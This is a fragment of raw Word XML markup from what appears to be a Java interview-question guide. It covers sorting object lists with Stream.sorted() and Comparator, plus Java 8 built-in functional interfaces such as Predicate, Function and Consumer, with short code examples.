          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Toc197867463"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How to sort the list of objects in java using Stream API?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w14:paraId="4136BBAD" w14:textId="27AEA4B6" w:rsidR="00F15F96" w:rsidRPr="009E5D84" w:rsidRDefault="00F15F96" w:rsidP="00326649">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You can sort a list of custom objects in Java using the </w:t>
      </w:r>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream.sorted()</w:t>
      </w:r>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method along with a </w:t>
      </w:r>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="009E5D84">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCAA91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D5811">
          <v:rect id="_x0000_i1736" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C60856"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orting a List of Employees by Age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403AA69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51565B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0EBF12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6902111" w14:textId="77777777" w:rsidR="00F15F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15F96" w:rsidP="008865BD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52515B3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 setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16256F94"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363A6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C6AB59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4C542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98618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 return name; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E1C37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 return age; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13B2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B85F3E"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83867">
          <v:rect id="_x0000_i1737" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="102AB3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Ascending):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513237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 = employeeList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D364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5A689910"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9C4CF07"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48920B">
          <v:rect id="_x0000_i1738" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E47460B"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Descending):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56C9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Desc = employeeList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F743B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reversed())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C6D4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982DD4"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7ACE7">
          <v:rect id="_x0000_i1739" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0323085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Multiple Fields (Age, then Name):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203C1C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Multi = employeeList.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152DD6C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1A952E7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enComparing(Employee::getName))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682552F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AECBA9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BE4">
          <v:rect id="_x0000_i1740" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF7CDC"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5B25F8BC"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rted()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in Stream API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC424F4"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mparator.comparing() for property-based comparison.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA8A9F"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in thenComparing() for multi-level sorting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E9D065" w14:textId="53641E3F"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1387EBF5"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50" w:name="_Toc197867464"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the inbuilt functional interface in Java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
    </w:p>
    <w:p w14:paraId="6F254751" w14:textId="42794F03" w:rsidR="00FE06FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE06FC"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built Functional Interfaces in Java 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DD695"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inbuilt functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the java.util.function package. These interfaces are used extensive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6D8DB1D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most commonly used ones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBBF1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24FCD3">
          <v:rect id="_x0000_i1742" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="420FEF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edicate&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786739E9"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boolean-valued function) on a single input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B25997B"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boolean test(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7DC4A5"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Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDDA4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x -&gt; x % 2 == 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC156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102D3B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03F919">
          <v:rect id="_x0000_i1743" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="325FC4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unction&lt;T, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05AD20"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 and returns result of type R.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF570D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B70EE"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case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data transformation (e.g., map())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713820D1"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Length = s -&gt; s.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114FE146"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apply("Java")); // 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081EAE9"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83B1A">
          <v:rect id="_x0000_i1744" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DB420"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onsumer&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35941468"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and performs some action (no return).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF9906"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void accept(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE3A57"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Printing or saving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C112087"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er = s -&gt; System.out.println("Hello, " + s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819BDE0"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er.accept("World"); // Hello, World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E960442"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803A92">
          <v:rect id="_x0000_i1745" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E0F32"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Supplier&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09EC59"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 returns a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCDD7D"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T get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189BF01"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Lazy loading / default values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7164D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Supplier = () -&gt; Math.random();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536D0B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Supplier.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1EE4C"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3E2FC">
          <v:rect id="_x0000_i1746" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="364FB014"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BiFunction&lt;T, U, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A22BA45"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arguments and returns a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1150BC17"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 U u)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C7BB8"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4E3338FB"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3, 4)); // 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DC7A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79F41">
          <v:rect id="_x0000_i1747" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77823786"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BinaryOperator&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5998FD4C"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inputs of the same type and returns the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A42EB"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BiFunction&lt;T, T, T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F262A4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multiply = (a, b) -&gt; a * b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631D2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5)); // 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1069E0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E58C47">
          <v:rect id="_x0000_i1748" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E5A7CD"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UnaryOperator&lt;T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6351E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one input and returns a result of the same type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A742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Function&lt;T, T&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015780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String&gt; upper = s -&gt; s.toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE15ED"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upper.apply("java")); // JAVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2875D131" w14:textId="47CAFA94"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49" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="693CAC8D" w14:textId="2DF5FCB1" w:rsidR="00886E46" w:rsidRPr="00CE4B95" w:rsidRDefault="00886E46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="251" w:name="_Toc197867465"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="008003BE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">redicate and </w:t>
      </w:r>
      <w:r w:rsidR="008003BE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>onsumer in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="251"/>
    </w:p>
    <w:p w14:paraId="57B4867F" w14:textId="1B01B147" w:rsidR="00886E46" w:rsidRPr="00CE4B95"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lt;T&gt; – For Conditional Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014225BF" w14:textId="0DB1316F"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condition (boolean-valued function) on an object of type T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AEC968" w14:textId="61C2395A"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oolean test(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09717D64" w14:textId="731F1D3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Filtering, validations, condition checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E425C4"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4BEBF79"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erThan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4C463E5"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3900FC"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A7BC372" w14:textId="1847890B"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3E5A400" w14:textId="5CEB503A" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6879FB" w14:textId="77777777" w:rsidR="00CE4630" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE4630" w:rsidP="00E02D02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD17900"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umer&lt;T&gt; – For Performing an Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BEF82" w14:textId="72DAD8F5"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erforms an operation on an object of type T (no return value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C02778" w14:textId="50C21B93"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66B6E6E1" w14:textId="41A8B7E2"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updating, applying changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0BE9E" w14:textId="77777777" w:rsidR="00062DC3" w:rsidRPr="00CE4B95" w:rsidRDefault="00062DC3" w:rsidP="00E02D02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C4401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41512736"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int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615A16AF"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B46C28" w14:textId="0EA4B09D"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printUp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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7618874E" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BC103"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World Use in Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBAF82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ennif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e"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF463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C66A0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 longer than 3 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF511D"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03777A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D035532" w14:textId="322CD9F6"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23C084D3" w14:textId="4D8B153F" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4320560B"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CE4B95" w14:paraId="48EBB8AC" w14:textId="77777777" w:rsidTr="00E02D02">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A91A961"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E02D02" w:rsidRPr="00CE4B95" w14:paraId="114C0862" w14:textId="77777777" w:rsidTr="00E02D02">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161882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aluate a condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w14:paraId="38CF96D0" w14:textId="77777777" w:rsidTr="00E02D02">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CEA5EEF"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 an action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BE7826C" w14:textId="66E99532" w:rsidR="00E02D02" w:rsidRPr="00CE4B95"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B1E91B"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52" w:name="_Toc197867466"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Predicate and Function?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="252"/>
    </w:p>
    <w:p w14:paraId="1FD353AD" w14:textId="5938EB7E" w:rsidR="001D097F" w:rsidRPr="00CE4B95"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CE4B95"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CE4B95" w14:paraId="306F9A62" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BCB825B"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1D097F" w:rsidRPr="00CE4B95" w14:paraId="2B64AD95" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44826FE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ransformation or mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="6D66C6EC" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5063FE4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r>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="6F77568F" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AEA305E"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type R (generic return type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="5923A48B" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5040960C"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r transforming data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="37CE114A" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="476C5DA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in streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="238DEB7A" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24301E36"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503BD4E"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424F"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1F9821E" w14:textId="0DFB36FE"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492F53BF" w14:textId="77777777" w:rsidR="00172DF7" w:rsidRPr="00CE4B95" w:rsidRDefault="00172DF7" w:rsidP="00172DF7">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Function Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29B57E"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54247E09"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040241"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F4685" w14:textId="6729F0D8"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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE5911"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 Use in Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A62598"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nath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my"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFCF9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EA569"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C96D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3D4A7CD"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lt;String&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503645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D172982"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A040A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Function to transform names to lengths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD6477"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ength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A64179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lt;String, Integer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEA37DB"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06D75EC"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81C224" w14:textId="4E01AC8E" w:rsidR="008D5FEC"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8, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F444B7" w14:textId="77777777" w:rsidR="008D5FEC" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5FEC" w:rsidP="007D2B36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515A2DC9" w14:textId="02FCE1AC" w:rsidR="007D2B36" w:rsidRPr="00CE4B95" w:rsidRDefault="007D2B36" w:rsidP="007D2B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CE4B95" w14:paraId="2FB24454" w14:textId="77777777" w:rsidTr="007D2B36">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9B5D7A"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ept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625DC28C"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7D2B36" w:rsidRPr="00CE4B95" w14:paraId="586E7B89" w14:textId="77777777" w:rsidTr="007D2B36">
